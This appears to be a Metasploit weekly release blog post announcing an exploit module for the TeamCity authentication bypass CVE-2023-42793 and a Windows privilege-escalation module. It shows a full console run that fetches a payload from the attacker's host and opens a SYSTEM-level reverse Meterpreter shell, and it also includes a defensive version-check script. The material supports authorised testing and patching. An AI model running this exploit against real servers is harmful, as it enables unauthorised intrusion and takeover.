Last updated at Mon, 22 Jan 2024 21:52:32 GMT
TeamCity authentication bypass and remote code execution
This week’s Metasploit release includes a new module for a critical authentication bypass in JetBrains TeamCity CI/CD Server. All versions of TeamCity prior to version 2023.05.4 are vulnerable to this issue. The vulnerability was originally discovered by SonarSource, and the Metasploit module was developed by Rapid7’s Principal Security Researcher Stephen Fewer, who additionally published a technical analysis of CVE-2023-42793 on AttackerKB. A Rapid7 TeamCity customer advisory has also been released with details on mitigation guidance.
This exploit works against both Windows and Linux targets. Example usage:
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > show options
Module options (exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.159.10 yes The target host(s)
RPORT 8111 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TEAMCITY_ADMIN_ID 1 yes The ID of an administrator account to authenticate as
TEAMCITY_CHANGE_TIMEOUT 30 yes The timeout to wait for changes to be applied
VHOST no HTTP server virtual host
Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILENAME cymQYMMk no Name to use on remote system when storing payload; cannot contain spaces.
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces.
LHOST 192.168.250.134 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > exploit
[*] Started reverse TCP handler on 192.168.250.134:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 2023.05.3 (build 129390) detected.
[*] Token already exists, deleting and generating a new one.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.UUxBSk0zMGk1eWFzRGZRYjg3LWJqWVVrY1Fn.YjU0NmIwYjUtNTZmNC00N2U3LWI4MGItMDdhOTQ0YjIzZGQ5
[*] Modifying internal.properties to allow process creation...
[*] Waiting for configuration change to be applied...
[*] Executing payload...
[*] Resetting internal.properties settings...
[*] Sending stage (200774 bytes) to 192.168.250.237
[*] Waiting for configuration change to be applied...
[*] Deleting authentication token.
[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 192.168.250.237:65397) at 2023-09-28 13:29:20 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DC
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : MSFLAB
Logged On Users : 9
Meterpreter : x64/windows
meterpreter >
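The post states the affected range (every release before 2023.05.4) and the module's check reports the version banner it found. As an added example that is not part of the post or of the Metasploit module, here is a defender-side triage helper that applies that boundary to TeamCity version banners; the hostnames and inventory are constructed sample data.

```python
import re

# Per the post, every TeamCity release before 2023.05.4 is affected by CVE-2023-42793.
FIXED_VERSION = (2023, 5, 4)

# Matches banners such as "2023.05.3 (build 129390)", "2023.05.4" or "2022.10.3".
_VERSION_RE = re.compile(r"(\d{4})\.(\d{2})(?:\.(\d+))?(?:\s*\(build\s+(\d+)\))?")


def parse_teamcity_version(banner: str):
    """Return (year, minor, patch, build) from a TeamCity version banner.

    A missing patch level (the first release of a branch, e.g. "2023.05") counts
    as patch 0; a missing build number is returned as None.
    """
    m = _VERSION_RE.search(banner)
    if not m:
        raise ValueError(f"unrecognised TeamCity version string: {banner!r}")
    year, minor, patch, build = m.groups()
    return int(year), int(minor), int(patch or 0), int(build) if build else None


def is_vulnerable(banner: str) -> bool:
    """True when the reported version predates the 2023.05.4 fix."""
    year, minor, patch, _build = parse_teamcity_version(banner)
    return (year, minor, patch) < FIXED_VERSION


def triage(inventory: dict) -> list:
    """Return the hosts (sorted) whose banner is still an affected release."""
    return sorted(host for host, banner in inventory.items() if is_vulnerable(banner))


if __name__ == "__main__":
    # Constructed sample inventory; the first banner is the one the module's check printed above.
    sample = {
        "teamcity-a.example.test": "JetBrains TeamCity 2023.05.3 (build 129390)",
        "teamcity-b.example.test": "TeamCity 2023.05.4",
        "teamcity-c.example.test": "TeamCity 2022.10.3",
        "teamcity-d.example.test": "TeamCity 2023.05",
    }
    for host in triage(sample):
        print(f"{host}: affected, upgrade to 2023.05.4 or later")
```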
New module content (2)
JetBrains TeamCity Unauthenticated Remote Code Execution
Author: sfewer-r7
Type: Exploit
Pull request: #18408 contributed by sfewer-r7
Path: multi/http/jetbrains_teamcity_rce_cve_2023_42793
Description: This adds an unauthenticated RCE for JetBrains' TeamCity server on both Linux and Windows. A remote attacker can exploit an authentication bypass vulnerability and then execute OS commands in the context of the service.
Microsoft Error Reporting Local Privilege Elevation Vulnerability
Authors: Filip Dragović (Wh04m1001), Octoberfest7, and bwatters-r7
Type: Exploit
Pull request: #18314 contributed by bwatters-r7
Path: windows/local/win_error_cve_2023_36874
Description: This adds an exploit module that leverages a directory traversal vulnerability in Windows 10. This vulnerability is identified as CVE-2023-36874 and enables an attacker to elevate privileges to those of the NT AUTHORITY\SYSTEM user. Note that this module works with Windows 10 x64 22H2.
Enhancements and features (1)
Documentation
You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).